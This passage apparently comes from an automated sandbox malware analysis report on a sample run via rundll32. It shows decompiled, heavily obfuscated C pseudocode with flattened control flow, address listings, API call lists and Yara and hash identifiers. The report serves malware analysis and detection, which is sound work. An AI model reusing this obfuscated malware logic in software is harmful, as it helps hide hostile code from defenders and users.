				_v2644 = _v2644 * 0x3b;
				_v2644 = _v2644 ^ 0x288fb790;
				_v2764 = 0x1d91e2;
				_v2764 = _v2764 | 0xd96eda72;
				_v2764 = _v2764 + 0xffffbbe3;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000d90f8;
				_v2696 = 0x4b7a41;
				_v2696 = _v2696 | 0xbfeeeeed;
				_v2696 = _v2696 ^ 0xbfe32e95;
				_v2708 = 0x8f6339;
				_v2708 = _v2708 | 0xa71a0417;
				_v2708 = _v2708 + 0xffff51d8;
				_v2708 = _v2708 ^ 0xa79b9aa8;
				_v2636 = 0x12e7d6;
				_v2636 = _v2636 * 0x21;
				_v2636 = _v2636 ^ 0x026e6de9;
				_v2756 = 0xd5c5d;
				_v2756 = _v2756 ^ 0x716456fc;
				_v2756 = _v2756 + 0xa334;
				_v2756 = _v2756 >> 0xc;
				_v2756 = _v2756 ^ 0x000918e1;
				_v2608 = 0xbb78a7;
				_v2608 = _v2608 + 0xd6b3;
				_v2608 = _v2608 ^ 0x00b2dabe;
				_v2668 = 0xad3636;
				_v2668 = _v2668 + 0xffffa01e;
				_v2668 = _v2668 ^ 0x00a02f3e;
				_v2628 = 0x4494fc;
				_v2628 = _v2628 / _t423;
				_v2628 = _v2628 ^ 0x0009fca5;
				_v2748 = 0x660e04;
				_v2748 = _v2748 + 0xffffa723;
				_v2748 = _v2748 | 0x67469fe4;
				_t424 = 0x4b;
				_v2748 = _v2748 * 5;
				_v2748 = _v2748 ^ 0x050bc0b3;
				_v2616 = 0xd4c89d;
				_v2616 = _v2616 << 7;
				_v2616 = _v2616 ^ 0x6a6fac0f;
				_v2700 = 0xaa08c8;
				_v2700 = _v2700 + 0xffffd108;
				_v2700 = _v2700 / _t424;
				_v2700 = _v2700 ^ 0x0001fda8;
				_v2732 = 0x67cb1c;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 | 0x2b3c2ffa;
				_v2732 = _v2732 ^ 0x295e7aa1;
				_v2732 = _v2732 ^ 0x06a01d44;
				_v2656 = 0xfaf065;
				_v2656 = _v2656 + 0xffff35fd;
				_v2656 = _v2656 ^ 0x00f58676;
				_v2740 = 0x2bd94;
				_v2740 = _v2740 + 0x3f47;
				_t425 = 0x2a;
				_v2740 = _v2740 / _t425;
				_v2740 = _v2740 ^ 0xca3749d7;
				_v2740 = _v2740 ^ 0xca3fc9be;
				_v2664 = 0x3942c4;
				_v2664 = _v2664 << 0xe;
				_v2664 = _v2664 ^ 0x50bf8d15;
				_v2724 = 0xb2ae33;
				_t426 = 0x22;
				_v2724 = _v2724 / _t426;
				_v2724 = _v2724 << 1;
				_v2724 = _v2724 ^ 0x6c628229;
				_v2724 = _v2724 ^ 0x6c6ae222;
				_v2640 = 0xd32362;
				_v2640 = _v2640 + 0xffff88f4;
				_v2640 = _v2640 ^ 0x00d4f71b;
				_v2648 = 0x3e5b4d;
				_v2648 = _v2648 + 0x4f8c;
				_v2648 = _v2648 ^ 0x003b681e;
				_v2676 = 0xc6bb8b;
				_v2676 = _v2676 << 4;
				_t427 = 0x14;
				_v2676 = _v2676 / _t427;
				_v2676 = _v2676 ^ 0x009ad4f5;
				_v2720 = 0xa3b34d;
				_v2720 = _v2720 + 0xffff97dd;
				_v2720 = _v2720 | 0x7136ebef;
				_v2720 = _v2720 ^ 0x71b8bb4e;
				_v2692 = 0xa7ff58;
				_t404 = _v2692 * 0x31;
				_v2692 = _t404;
				_v2692 = _v2692 >> 4;
				_v2692 = _v2692 ^ 0x020bdfc2;
				_v2624 = 0xa501ce;
				_v2624 = _v2624 | 0xdc20330f;
				_v2624 = _v2624 ^ 0xdca3e6f8;
				_v2632 = 0xa992b7;
				_v2632 = _v2632 | 0x4e4d69fe;
				_v2632 = _v2632 ^ 0x4ee71179;
				while(_t464 != 0x2953b22) {
					if(_t464 == 0x422d362) {
						_t464 = 0xe704baa;
						continue;
					} else {
						_t475 = _t464 - 0xe704baa;
						if(_t464 != 0xe704baa) {
							L8:
							__eflags = _t464 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E003612A8(_t427, _v2684, _t475, _v2768, _v2736,  &_v2600);
							 *((short*)(E00354FA8(_v2760,  &_v2600, _v2744, _v2604))) = 0;
							E00348650(_v2712,  &_v1560, _t475, _v2728);
							_push(_v2612);
							_push(_v2680);
							_push(0x34181c);
							E0034E7CE(E0034AB66(_v2752, _v2660, _t475), _t475, _v2672,  &_v2600, _v2752, _v2772, _v2776, _v2652, _v2620,  &_v1560);
							E0034AE03(_v2688, _v2704, _v2644, _t415);
							_t427 = _v2764;
							_t404 = E0035C38F(_t427,  &_v2080, _t463, _v2696);
							_t468 =  &(_t468[0x15]);
							if(_t404 != 0) {
								_t464 = 0x2953b22;
								continue;
							}
						}
					}
					return _t404;
				}
				_push(_t427);
				E0034EA7B( &_v1040, _v2708, _v2716, _t427, _v2636, _v2756, _v2608);
				_push(_v2616);
				_push(_v2748);
				_push(0x3418cc);
				E0034E7CE(E0034AB66(_v2668, _v2628, __eflags), __eflags, _v2700,  &_v1040, _v2668, _v2732, _v2656, _v2740, _v2664,  &_v2080);
				_t430 = _v2724;
				E0034AE03(_t430, _v2640, _v2648, _t406);
				_push(_v2632);
				_push(_v2624);
				_push(_v2692);
				_push(0);
				_push(0);
				_push(_v2720);
				_push(_t430);
				_push(0);
				_t427 =  &_v520;
				_t404 = E00349700(_t427, _v2676, __eflags);
				_t468 =  &(_t468[0x1c]);
				_t464 = 0x740d40c;
				goto L8;
			}
































































                                                                                                                      0x00347b82
                                                                                                                      0x00347b88
                                                                                                                      0x00347b92
                                                                                                                      0x00347b97
                                                                                                                      0x00347b9c
                                                                                                                      0x00347ba4
                                                                                                                      0x00347bac
                                                                                                                      0x00347bb4
                                                                                                                      0x00347bbc
                                                                                                                      0x00347bc4
                                                                                                                      0x00347bcc
                                                                                                                      0x00347bd4
                                                                                                                      0x00347bd9
                                                                                                                      0x00347be1
                                                                                                                      0x00347be9
                                                                                                                      0x00347bf1
                                                                                                                      0x00347bf9
                                                                                                                      0x00347c08
                                                                                                                      0x00347c0c
                                                                                                                      0x00347c0e
                                                                                                                      0x00347c16
                                                                                                                      0x00347c1b
                                                                                                                      0x00347c23
                                                                                                                      0x00347c28
                                                                                                                      0x00347c30
                                                                                                                      0x00347c38
                                                                                                                      0x00347c40
                                                                                                                      0x00347c4d
                                                                                                                      0x00347c50
                                                                                                                      0x00347c59
                                                                                                                      0x00347c5d
                                                                                                                      0x00347c65
                                                                                                                      0x00347c6d
                                                                                                                      0x00347c78
                                                                                                                      0x00347c83
                                                                                                                      0x00347c8e
                                                                                                                      0x00347c96
                                                                                                                      0x00347c9e
                                                                                                                      0x00347ca6
                                                                                                                      0x00347cae
                                                                                                                      0x00347cb6
                                                                                                                      0x00347cbe
                                                                                                                      0x00347cc6
                                                                                                                      0x00347cce
                                                                                                                      0x00347cd6
                                                                                                                      0x00347ce6
                                                                                                                      0x00347cea
                                                                                                                      0x00347cf2
                                                                                                                      0x00347cfa
                                                                                                                      0x00347d05
                                                                                                                      0x00347d10
                                                                                                                      0x00347d1b
                                                                                                                      0x00347d27
                                                                                                                      0x00347d2a
                                                                                                                      0x00347d33
                                                                                                                      0x00347d37
                                                                                                                      0x00347d3f
                                                                                                                      0x00347d52
                                                                                                                      0x00347d59
                                                                                                                      0x00347d64
                                                                                                                      0x00347d6c
                                                                                                                      0x00347d70
                                                                                                                      0x00347d78
                                                                                                                      0x00347d80
                                                                                                                      0x00347d88
                                                                                                                      0x00347d8d
                                                                                                                      0x00347d95
                                                                                                                      0x00347d9f
                                                                                                                      0x00347da7
                                                                                                                      0x00347daf
                                                                                                                      0x00347db7
                                                                                                                      0x00347dbf
                                                                                                                      0x00347dc7
                                                                                                                      0x00347ddc
                                                                                                                      0x00347ddf
                                                                                                                      0x00347de6
                                                                                                                      0x00347df1
                                                                                                                      0x00347dfc
                                                                                                                      0x00347e07
                                                                                                                      0x00347e12
                                                                                                                      0x00347e1a
                                                                                                                      0x00347e22
                                                                                                                      0x00347e2a
                                                                                                                      0x00347e32
                                                                                                                      0x00347e3a
                                                                                                                      0x00347e42
                                                                                                                      0x00347e4a
                                                                                                                      0x00347e52
                                                                                                                      0x00347e65
                                                                                                                      0x00347e6c
                                                                                                                      0x00347e77
                                                                                                                      0x00347e7f
                                                                                                                      0x00347e87
                                                                                                                      0x00347e8f
                                                                                                                      0x00347e94
                                                                                                                      0x00347e9c
                                                                                                                      0x00347ea4
                                                                                                                      0x00347eac
                                                                                                                      0x00347eb4
                                                                                                                      0x00347ebc
                                                                                                                      0x00347ec4
                                                                                                                      0x00347ecc
                                                                                                                      0x00347ed4
                                                                                                                      0x00347ee7
                                                                                                                      0x00347eee
                                                                                                                      0x00347ef9
                                                                                                                      0x00347f01
                                                                                                                      0x00347f09
                                                                                                                      0x00347f11
                                                                                                                      0x00347f16
                                                                                                                      0x00347f1e
                                                                                                                      0x00347f29
                                                                                                                      0x00347f34
                                                                                                                      0x00347f3f
                                                                                                                      0x00347f47
                                                                                                                      0x00347f4f
                                                                                                                      0x00347f57
                                                                                                                      0x00347f6d
                                                                                                                      0x00347f74
                                                                                                                      0x00347f7f
                                                                                                                      0x00347f87
                                                                                                                      0x00347f8f
                                                                                                                      0x00347f9c
                                                                                                                      0x00347f9d
                                                                                                                      0x00347fa1
                                                                                                                      0x00347fa9
                                                                                                                      0x00347fb4
                                                                                                                      0x00347fbc
                                                                                                                      0x00347fc7
                                                                                                                      0x00347fcf
                                                                                                                      0x00347fdd
                                                                                                                      0x00347fe1
                                                                                                                      0x00347fe9
                                                                                                                      0x00347ff1
                                                                                                                      0x00347ff6
                                                                                                                      0x00347ffe
                                                                                                                      0x00348008
                                                                                                                      0x00348015
                                                                                                                      0x00348020
                                                                                                                      0x0034802b
                                                                                                                      0x00348036
                                                                                                                      0x0034803e
                                                                                                                      0x0034804c
                                                                                                                      0x00348051
                                                                                                                      0x00348057
                                                                                                                      0x0034805f
                                                                                                                      0x00348067
                                                                                                                      0x00348072
                                                                                                                      0x0034807a
                                                                                                                      0x00348085
                                                                                                                      0x00348091
                                                                                                                      0x00348096
                                                                                                                      0x0034809c
                                                                                                                      0x003480a0
                                                                                                                      0x003480a8
                                                                                                                      0x003480b0
                                                                                                                      0x003480bb
                                                                                                                      0x003480c6
                                                                                                                      0x003480d1
                                                                                                                      0x003480dc
                                                                                                                      0x003480e7
                                                                                                                      0x003480f2
                                                                                                                      0x003480fa
                                                                                                                      0x00348103
                                                                                                                      0x00348106
                                                                                                                      0x0034810a
                                                                                                                      0x00348112
                                                                                                                      0x0034811a
                                                                                                                      0x00348122
                                                                                                                      0x0034812a
                                                                                                                      0x00348132
                                                                                                                      0x0034813a
                                                                                                                      0x0034813f
                                                                                                                      0x00348143
                                                                                                                      0x00348148
                                                                                                                      0x00348150
                                                                                                                      0x0034815b
                                                                                                                      0x00348166
                                                                                                                      0x00348171
                                                                                                                      0x0034817c
                                                                                                                      0x00348187
                                                                                                                      0x00348192
                                                                                                                      0x003481a0
                                                                                                                      0x003482a5
                                                                                                                      0x00000000
                                                                                                                      0x003481a6
                                                                                                                      0x003481a6
                                                                                                                      0x003481ac
                                                                                                                      0x0034838b
                                                                                                                      0x0034838b
                                                                                                                      0x00348391
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003481b2
                                                                                                                      0x003481c6
                                                                                                                      0x003481f3
                                                                                                                      0x003481fa
                                                                                                                      0x003481ff
                                                                                                                      0x00348206
                                                                                                                      0x00348218
                                                                                                                      0x0034825e
                                                                                                                      0x00348276
                                                                                                                      0x00348282
                                                                                                                      0x0034828e
                                                                                                                      0x00348293
                                                                                                                      0x00348298
                                                                                                                      0x0034829e
                                                                                                                      0x00000000
                                                                                                                      0x0034829e
                                                                                                                      0x00348298
                                                                                                                      0x003481ac
                                                                                                                      0x003483a0
                                                                                                                      0x003483a0
                                                                                                                      0x003482af
                                                                                                                      0x003482d2
                                                                                                                      0x003482d7
                                                                                                                      0x003482de
                                                                                                                      0x003482f0
                                                                                                                      0x00348333
                                                                                                                      0x00348347
                                                                                                                      0x0034834b
                                                                                                                      0x00348353
                                                                                                                      0x0034835a
                                                                                                                      0x00348361
                                                                                                                      0x00348365
                                                                                                                      0x00348367
                                                                                                                      0x00348369
                                                                                                                      0x00348374
                                                                                                                      0x00348375
                                                                                                                      0x00348377
                                                                                                                      0x0034837e
                                                                                                                      0x00348383
                                                                                                                      0x00348386
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AzK$G?$M[>$[B$]\$h$$mP$z-$R)$6q
                                                                                                                      • API String ID: 0-2334141070
                                                                                                                      • Opcode ID: 70e268b9e9c23e6bb35cb627c8fcc46c3df592d2c95685721ff699e4ac15831a
                                                                                                                      • Instruction ID: afbbf616f3d3ae80e8832ca75c367a4bc469fd81ae5b73348bc6bc132fa76b32
                                                                                                                      • Opcode Fuzzy Hash: 70e268b9e9c23e6bb35cb627c8fcc46c3df592d2c95685721ff699e4ac15831a
                                                                                                                      • Instruction Fuzzy Hash: 14121071508381DFD3A9CF21C58AA8FBBE1BBC4718F108A1DE1D98A260D7B19949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                      • CharUpperA.USER32 ref: 10021943
                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3249967234-0
                                                                                                                      • Opcode ID: 2a3499f3841ad5e8647b8f951358b7882037f476afa2bf570201f6c7d6c9b385
                                                                                                                      • Instruction ID: ae62b421250eabce0d7e10c45050fda11272d0be93f4f0cc1201f2dd6aedebe3
                                                                                                                      • Opcode Fuzzy Hash: 2a3499f3841ad5e8647b8f951358b7882037f476afa2bf570201f6c7d6c9b385
                                                                                                                      • Instruction Fuzzy Hash: 1B41DE7990024AAFEB11DBB4DC85AFF77BCEF15355F800529F815E2192EB30A9448A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00346083 Relevance: 11.7, Strings: 9, Instructions: 413COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00346083(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v256;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				void* _t385;
				void* _t420;
				intOrPtr _t421;
				intOrPtr _t422;
				void* _t428;
				void* _t430;
				intOrPtr _t439;
				intOrPtr _t440;
				intOrPtr _t447;
				intOrPtr _t448;
				signed int _t451;
				void* _t458;
				intOrPtr _t460;
				intOrPtr _t461;
				intOrPtr _t495;
				signed int _t502;
				signed int _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				void* _t514;
				signed int* _t516;
				void* _t520;

				_push(_a20);
				_t514 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t385);
				_v320 = 0x5bfd8;
				_t516 =  &(( &_v424)[7]);
				_v320 = _v320 ^ 0xae83e4b4;
				_v320 = _v320 + 0xffffbfdd;
				_t448 = 0;
				_v320 = _v320 ^ 0xae801261;
				_t451 = 0x4bae340;
				_v384 = 0x359b5d;
				_v384 = _v384 >> 9;
				_v384 = _v384 + 0x5a0;
				_v384 = _v384 ^ 0x40b7bf66;
				_v384 = _v384 ^ 0x40befa95;
				_v316 = 0x2933e6;
				_t502 = 0x13;
				_t504 = 0xf;
				_v316 = _v316 * 0x63;
				_v316 = _v316 ^ 0x0fe001ce;
				_v300 = 0x5708b8;
				_v300 = _v300 | 0xa16343bc;
				_v300 = _v300 ^ 0xa1786c90;
				_v308 = 0x5d4fad;
				_v308 = _v308 + 0xffffde8c;
				_v308 = _v308 ^ 0x0055ed4e;
				_v312 = 0x97068f;
				_v312 = _v312 >> 1;
				_v312 = _v312 ^ 0x0045ea4b;
				_v284 = 0xe9a634;
				_v284 = _v284 ^ 0x5bc7ef92;
				_v284 = _v284 ^ 0x5b2ed6c9;
				_v344 = 0xd52660;
				_v344 = _v344 + 0x6034;
				_v344 = _v344 >> 7;
				_v344 = _v344 ^ 0x000a9937;
				_v412 = 0x492529;
				_t55 =  &_v412; // 0x492529
				_v412 =  *_t55 * 0xa;
				_t57 =  &_v412; // 0x492529
				_v412 =  *_t57 / _t502;
				_t63 =  &_v412; // 0x492529
				_v412 =  *_t63 / _t504;
				_v412 = _v412 ^ 0x000522b4;
				_v360 = 0xff1035;
				_v360 = _v360 >> 5;
				_v360 = _v360 << 5;
				_v360 = _v360 ^ 0x00f6febc;
				_v352 = 0x24acbd;
				_v352 = _v352 >> 0xc;
				_v352 = _v352 * 0x36;
				_v352 = _v352 ^ 0x000a49b8;
				_v404 = 0x5e8a96;
				_v404 = _v404 >> 1;
				_v404 = _v404 / _t502;
				_v404 = _v404 + 0xffff7de4;
				_v404 = _v404 ^ 0x00019221;
				_v372 = 0xa45532;
				_v372 = _v372 + 0xffff1c48;
				_v372 = _v372 + 0xffffe0f0;
				_t505 = 0x6c;
				_v372 = _v372 * 0x6c;
				_v372 = _v372 ^ 0x44ea3f2c;
				_v380 = 0xf56085;
				_v380 = _v380 / _t505;
				_t506 = 0xd;
				_v380 = _v380 / _t506;
				_v380 = _v380 << 0xe;
				_v380 = _v380 ^ 0x0b2ea957;
				_v328 = 0x46776f;
				_v328 = _v328 + 0x15ec;
				_t507 = 0x1c;
				_v328 = _v328 * 0x5e;
				_v328 = _v328 ^ 0x19ebcb1f;
				_v388 = 0xfbc23f;
				_v388 = _v388 | 0xf6357e00;
				_v388 = _v388 + 0x8932;
				_v388 = _v388 ^ 0xf4ea365f;
				_v388 = _v388 ^ 0x03ea209f;
				_v336 = 0x730db6;
				_v336 = _v336 * 0x5b;
				_v336 = _v336 | 0x6492896b;
				_v336 = _v336 ^ 0x6cf77a3a;
				_v340 = 0x166b3b;
				_v340 = _v340 | 0x8c211161;
				_v340 = _v340 ^ 0x8c378fd9;
				_v396 = 0x9d5a93;
				_v396 = _v396 / _t507;
				_v396 = _v396 ^ 0xba861a50;
				_v396 = _v396 + 0xffff5b99;
				_v396 = _v396 ^ 0xba80e2b9;
				_v420 = 0x409c68;
				_t508 = 0x31;
				_v420 = _v420 / _t508;
				_v420 = _v420 >> 8;
				_t509 = 5;
				_v420 = _v420 * 0x16;
				_v420 = _v420 ^ 0x00013fee;
				_v296 = 0xc785e1;
				_v296 = _v296 ^ 0x791e03db;
				_v296 = _v296 ^ 0x79d79a97;
				_v364 = 0xad0976;
				_v364 = _v364 | 0x8850e8a8;
				_v364 = _v364 << 1;
				_v364 = _v364 ^ 0x11fb25d1;
				_v368 = 0x704a10;
				_v368 = _v368 + 0xffff0d6b;
				_v368 = _v368 << 2;
				_v368 = _v368 ^ 0x01b3e76e;
				_v288 = 0x54d2f6;
				_v288 = _v288 / _t509;
				_v288 = _v288 ^ 0x001edf05;
				_v392 = 0x949bbb;
				_v392 = _v392 + 0xbb88;
				_v392 = _v392 | 0xb3cb4dcc;
				_v392 = _v392 * 0x45;
				_v392 = _v392 ^ 0x7b348758;
				_v416 = 0x643691;
				_v416 = _v416 >> 9;
				_v416 = _v416 + 0xffff74a1;
				_t510 = 0x4e;
				_v416 = _v416 / _t510;
				_v416 = _v416 ^ 0x03464fba;
				_v356 = 0xeb775b;
				_v356 = _v356 + 0xdb8c;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 ^ 0x0001ede4;
				_v304 = 0xc1e7b5;
				_v304 = _v304 + 0xf3ef;
				_v304 = _v304 ^ 0x00c2397a;
				_v376 = 0xa68bc9;
				_t511 = 0x43;
				_v376 = _v376 / _t511;
				_v376 = _v376 >> 8;
				_v376 = _v376 ^ 0x3383f04e;
				_v376 = _v376 ^ 0x3381e4d6;
				_v408 = 0x4d9cfa;
				_t512 = 0x46;
				_t503 = _v340;
				_v408 = _v408 * 0x6f;
				_v408 = _v408 + 0x3c4a;
				_v408 = _v408 << 2;
				_v408 = _v408 ^ 0x869e5b7f;
				_v324 = 0x71360b;
				_v324 = _v324 * 0xc;
				_v324 = _v324 ^ 0x901d1633;
				_v324 = _v324 ^ 0x9559eaf9;
				_v292 = 0x9a124c;
				_v292 = _v292 + 0x530b;
				_v292 = _v292 ^ 0x0097d0f0;
				_v424 = 0x6705b6;
				_v424 = _v424 ^ 0xd04d23dd;
				_v424 = _v424 << 4;
				_v424 = _v424 >> 0xa;
				_v424 = _v424 ^ 0x000c33e5;
				_v348 = 0x1e9503;
				_v348 = _v348 >> 3;
				_v348 = _v348 ^ 0x290fe667;
				_v348 = _v348 ^ 0x2908b2d4;
				_v400 = 0xb348f5;
				_v400 = _v400 ^ 0x711fc93f;
				_v400 = _v400 << 8;
				_v400 = _v400 * 0x58;
				_v400 = _v400 ^ 0x4c97e764;
				_v332 = 0xe64092;
				_t513 = _v340;
				_v332 = _v332 / _t512;
				_v332 = _v332 + 0x1e96;
				_v332 = _v332 ^ 0x00036ca6;
				while(1) {
					L1:
					_t420 = 0xee6d0ab;
					do {
						while(1) {
							L2:
							_t520 = _t451 - 0x77439d8;
							if(_t520 > 0) {
								break;
							}
							if(_t520 == 0) {
								E003468DE(_v420, _v296, _v364, _v368, _v264);
								_t516 =  &(_t516[3]);
								_t451 = 0x2f9aadd;
								while(1) {
									L1:
									_t420 = 0xee6d0ab;
									goto L2;
								}
							} else {
								if(_t451 == 0x195d899) {
									_t460 =  *0x365214; // 0x0
									_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0x3c)) + 0x58));
									 *((intOrPtr*)(_t460 + 0x38)) =  *((intOrPtr*)(_t460 + 0x38)) + 1;
									_t495 =  *((intOrPtr*)(_t460 + 0x38));
									 *((intOrPtr*)(_t460 + 0x3c)) = _t439;
									if(_t439 == 0) {
										 *((intOrPtr*)(_t460 + 0x3c)) =  *((intOrPtr*)(_t460 + 4));
									}
									_t440 =  *0x365214; // 0x0
									if(_t495 >=  *((intOrPtr*)(_t440 + 0x44))) {
										_t461 =  *0x365214; // 0x0
										 *(_t461 + 0x38) =  *(_t461 + 0x38) & 0x00000000;
									} else {
										_t451 = 0x4bae340;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								} else {
									if(_t451 == 0x2f9aadd) {
										E003468DE(_v288, _v392, _v416, _v356, _v280);
										E003468DE(_v304, _v376, _v408, _v324, _t513);
										E003468DE(_v292, _v424, _v348, _v400, _v272);
										_t516 =  &(_t516[9]);
										_t451 = _t503;
										L33:
										_t420 = 0xee6d0ab;
										goto L34;
									} else {
										if(_t451 == 0x4bae340) {
											_t513 = 0;
											E00361310(0x100,  &_v256, _v320, _v384, _v316, _v300);
											_v272 = _v272 & 0;
											_t516 =  &(_t516[4]);
											_v268 = _v268 & 0;
											_t451 = 0xce40172;
											_v280 = _v280 & 0;
											_v276 = _v276 & 0;
											while(1) {
												L1:
												_t420 = 0xee6d0ab;
												goto L2;
											}
										} else {
											if(_t451 != 0x55bcf65) {
												goto L34;
											} else {
												if(_v276 >= _v332) {
													_t447 = E00356864( &_v280,  &_v272);
												} else {
													_t447 = E00352753( &_v280);
												}
												_t513 = _t447;
												_t420 = 0xee6d0ab;
												_t451 =  !=  ? 0xee6d0ab : 0x2f9aadd;
												continue;
											}
										}
									}
								}
							}
							L37:
							return _t448;
						}
						if(_t451 == 0xa3ea571) {
							_t421 =  *0x365214; // 0x0
							_t422 =  *0x365214; // 0x0
							_t428 = E00357BCA(( *(_t421 + 0x3c))[0x28] & 0x0000ffff,  &_v256,  *( *(_t421 + 0x3c)) & 0x0000ffff, _v372, _v380, _v328, _t513,  &_v272,  &_v264, _v388,  *((intOrPtr*)(_t422 + 0x3c)) + 0x20, _v336);
							_t516 =  &(_t516[0xa]);
							if(_t428 == 0) {
								_t503 = 0x195d899;
								_t451 = 0x2f9aadd;
								goto L33;
							} else {
								_t451 = 0xcddb738;
								goto L1;
							}
						} else {
							if(_t451 == 0xcddb738) {
								if(E0034BD0F( &_v264, _v340, _t514, _v396) == 0) {
									_t503 = 0x195d899;
								} else {
									_t503 = 0x1fe0da0;
									_t448 = 1;
								}
								_t451 = 0x77439d8;
								while(1) {
									L1:
									_t420 = 0xee6d0ab;
									goto L2;
								}
							} else {
								if(_t451 == 0xce40172) {
									_t430 = E00341F9B(_a20,  &_v280, _v308, _v312, _v284, _v344, _a8);
									_t516 =  &(_t516[5]);
									if(_t430 != 0) {
										_t451 = 0x55bcf65;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								} else {
									if(_t451 != _t420) {
										goto L34;
									} else {
										_push(E0034EF71(1, 0x40));
										_push(_v404);
										_push( &_v256);
										_t458 = 0xb;
										E00345A07(_t458, _v352);
										_t516 =  &(_t516[5]);
										_t451 = 0xa3ea571;
										while(1) {
											L1:
											_t420 = 0xee6d0ab;
											goto L2;
										}
									}
								}
							}
						}
						goto L37;
						L34:
					} while (_t451 != 0x1fe0da0);
					goto L37;
				}
			}











































































                                                                                                                      0x0034608d
                                                                                                                      0x00346094
                                                                                                                      0x00346096
                                                                                                                      0x0034609d
                                                                                                                      0x003460a4
                                                                                                                      0x003460ab
                                                                                                                      0x003460b2
                                                                                                                      0x003460b3
                                                                                                                      0x003460b4
                                                                                                                      0x003460b9
                                                                                                                      0x003460c4
                                                                                                                      0x003460c7
                                                                                                                      0x003460d1
                                                                                                                      0x003460d9
                                                                                                                      0x003460db
                                                                                                                      0x003460e3
                                                                                                                      0x003460e8
                                                                                                                      0x003460f0
                                                                                                                      0x003460f5
                                                                                                                      0x003460fd
                                                                                                                      0x00346105
                                                                                                                      0x0034610d
                                                                                                                      0x0034611c
                                                                                                                      0x0034611f
                                                                                                                      0x00346120
                                                                                                                      0x00346124
                                                                                                                      0x0034612c
                                                                                                                      0x00346137
                                                                                                                      0x00346142
                                                                                                                      0x0034614d
                                                                                                                      0x00346158
                                                                                                                      0x00346163
                                                                                                                      0x0034616e
                                                                                                                      0x00346179
                                                                                                                      0x00346180
                                                                                                                      0x0034618b
                                                                                                                      0x00346196
                                                                                                                      0x003461a1
                                                                                                                      0x003461ac
                                                                                                                      0x003461b4
                                                                                                                      0x003461bc
                                                                                                                      0x003461c1
                                                                                                                      0x003461c9
                                                                                                                      0x003461d1
                                                                                                                      0x003461d6
                                                                                                                      0x003461da
                                                                                                                      0x003461e2
                                                                                                                      0x003461e6
